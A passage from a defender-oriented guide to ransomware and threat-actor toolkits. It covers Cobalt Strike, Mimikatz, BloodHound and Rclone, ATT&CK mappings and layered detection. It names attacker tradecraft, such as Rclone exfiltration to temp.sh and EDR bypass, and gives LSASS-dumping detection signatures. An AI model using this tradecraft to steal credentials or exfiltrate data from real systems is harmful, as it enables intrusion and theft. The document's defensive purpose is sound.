- Encryption - Ransomware payload deployed via PsExec, WMI, or GPO
The median dwell time before ransomware deployment is approximately five days (Gridinsoft). Time to Ransomware (TTR) averaged 156 hours in recent incidents.
Group-Specific Preferences
LockBit - Cobalt Strike, PsExec, Rclone, custom encryptor. Used Warp AVKiller for EDR bypass.
Black Basta - Cobalt Strike or Brute Ratel, BloodHound, Rclone to temp.sh, batch scripts for security disabling.
Akira - Shares code lineage with Conti. Uses Rclone, WinSCP, custom tools.
Qilin - Remote access exploits for entry, NetSupport Manager, Rclone for exfiltration.
MITRE ATT&CK Mapping Summary
The tools covered in this guide map to specific ATT&CK techniques:
| Tool Category | Primary Techniques |
|---|---|
| C2 Frameworks | T1071, T1572, T1055, T1059 |
| Credential Theft | T1003, T1550, T1558 |
| AD Reconnaissance | T1087, T1069, T1135 |
| Lateral Movement | T1021, T1047, T1569 |
| Privilege Escalation | T1548, T1134 |
| LOLBins | T1218, T1059 |
| Exfiltration | T1567, T1048 |
Using ATT&CK mapping helps defenders prioritise detection engineering. Focus on the techniques appearing most frequently in threat intelligence for your industry sector.
Building Detection Coverage
Effective detection requires layered approaches:
Endpoint Telemetry - EDR solutions should capture process creation, network connections, and credential access events. Ensure coverage for in-memory attacks and LOLBin abuse.
Network Monitoring - Baseline normal traffic patterns. Alert on unusual DNS queries, unexpected cloud service connections, and lateral movement protocols (SMB, WMI, WinRM) between endpoints.
Identity Monitoring - Track authentication patterns, privilege changes, and Kerberos ticket activity. BloodHound and Mimikatz usage often manifests through unusual LDAP queries and authentication events.
Log Aggregation - Centralise Windows Event Logs, PowerShell Script Block Logging, and Sysmon data. Correlate across sources to identify attack chains.
Summary
Threat actors operate with a remarkably consistent toolkit. Cobalt Strike, Mimikatz, BloodHound, and Rclone appear across nation-state, crimeware, and ransomware operations. Living-off-the-land techniques using PowerShell and other LOLBins dominate modern attack chains.
Understanding these tools provides defenders with concrete detection targets. Rather than chasing indicators of compromise that change daily, focus on the techniques and tradecraft that persist across campaigns.
Key principles for defenders:
- Assume breach - Modern attacks leverage legitimate tools that bypass perimeter defences
- Focus on behaviour - Signature-based detection fails against dual-use tools
- Layer detection - Combine endpoint, network, and identity monitoring
- Map to ATT&CK - Prioritise detection engineering based on threat intelligence
- Practice response - When you detect Cobalt Strike, BloodHound, or Rclone, you need fast containment
The tools will evolve. Sliver gains ground on Cobalt Strike and new C2 frameworks emerge, but the fundamental tradecraft patterns remain stable. Build detection capability around those patterns.
Last updated: January 2026
References and Sources
- Vectra AI. (2025). Living off the Land Attacks. Key finding: 84% of high-severity attacks in 2024 leveraged legitimate tools; PowerShell appeared in 71% of LOTL attacks.
- CrowdStrike. (2025). Global Threat Report 2025. Key finding: 62% of threat detections were malware-free attacks using LOTL methods.
- Fortra. (2025). Update: Stopping Cybercriminals from Abusing Cobalt Strike. Key finding: 80% reduction in unauthorised Cobalt Strike copies over two years.
- ReliaQuest. (2024). Exfiltration Tools Report. Key finding: Rclone appeared in 57% of ransomware incidents (September 2023 - July 2024).
- The DFIR Report. (2024-2025). Case Studies. Multiple ransomware intrusion analyses documenting Cobalt Strike, Sliver, and common toolchain patterns.
- MITRE ATT&CK. (2025). Groups, Software, and Techniques. Framework for threat actor tool mapping.
- Red Canary. (2025). Threat Detection Report: C2 Frameworks. Key finding: Cobalt Strike ranked #8 overall threat; Sliver, Brute Ratel, Mythic gaining adoption.
- Mandiant/Google Cloud. (2024). Defining Cobalt Strike Components. Technical deep-dive on Beacon implant and Cobalt Strike capabilities.
- SpecterOps. (2025). BloodHound Documentation. Attack path management and Active Directory reconnaissance tool documentation.
Frequently Asked Questions
What is Cobalt Strike and why do attackers use it?
Cobalt Strike is a commercial penetration testing tool whose Beacon implant provides command execution, credential theft, lateral movement, and encrypted C2 communications. Attackers favour it for its stability, flexibility, and extensive capabilities. Pirated versions have been widely available, though recent enforcement reduced their prevalence by 80%.
How do I detect Mimikatz in my environment?
Focus on LSASS access patterns, authentication anomalies, and process behaviour rather than file hashes. Sysmon Event ID 10 (ProcessAccess) records which process opened lsass.exe and with what access mask; masks such as 0x1010, 0x1410, and 0x1FFFFF from images outside the normal Windows set are the classic dumping signature. Then look for the stolen material being used: 4624 logons with logon type 9 (NewCredentials, which is what sekurlsa::pth produces), 4672 special-privilege logons for unexpected accounts, and 4768/4769 Kerberos ticket activity that does not fit the account. Cobalt Strike can run Mimikatz in memory without disk artifacts, so file-based signatures alone are not enough.
What is the difference between Cobalt Strike and Sliver?
Cobalt Strike is commercial ($5,900/user) with extensive customisation options. Sliver is open-source, written in Go, and supports similar C2 capabilities. Both provide post-exploitation functionality. Sliver adoption increased as defenders improved Cobalt Strike detection and enforcement actions reduced pirated copies.
Why do ransomware groups use Rclone?
Rclone transfers data quickly to multiple cloud services, blends with legitimate backup traffic, operates cross-platform, and automates large transfers. Its versatility and speed make it ideal for exfiltrating data before encryption in double extortion attacks.
What are LOLBins and why are they dangerous?
Living-off-the-Land Binaries (LOLBins) are legitimate Windows tools like PowerShell, certutil, and mshta that attackers abuse for malicious purposes. They're dangerous because security tools trust them, they leave minimal forensic artifacts, and their legitimate use makes malicious activity difficult to distinguish.
How do I map these tools to my detection capabilities?
Use MITRE ATT&CK to identify which techniques each tool enables, then assess whether your current telemetry and detection rules cover those techniques. Prioritise based on threat intelligence relevant to your industry sector.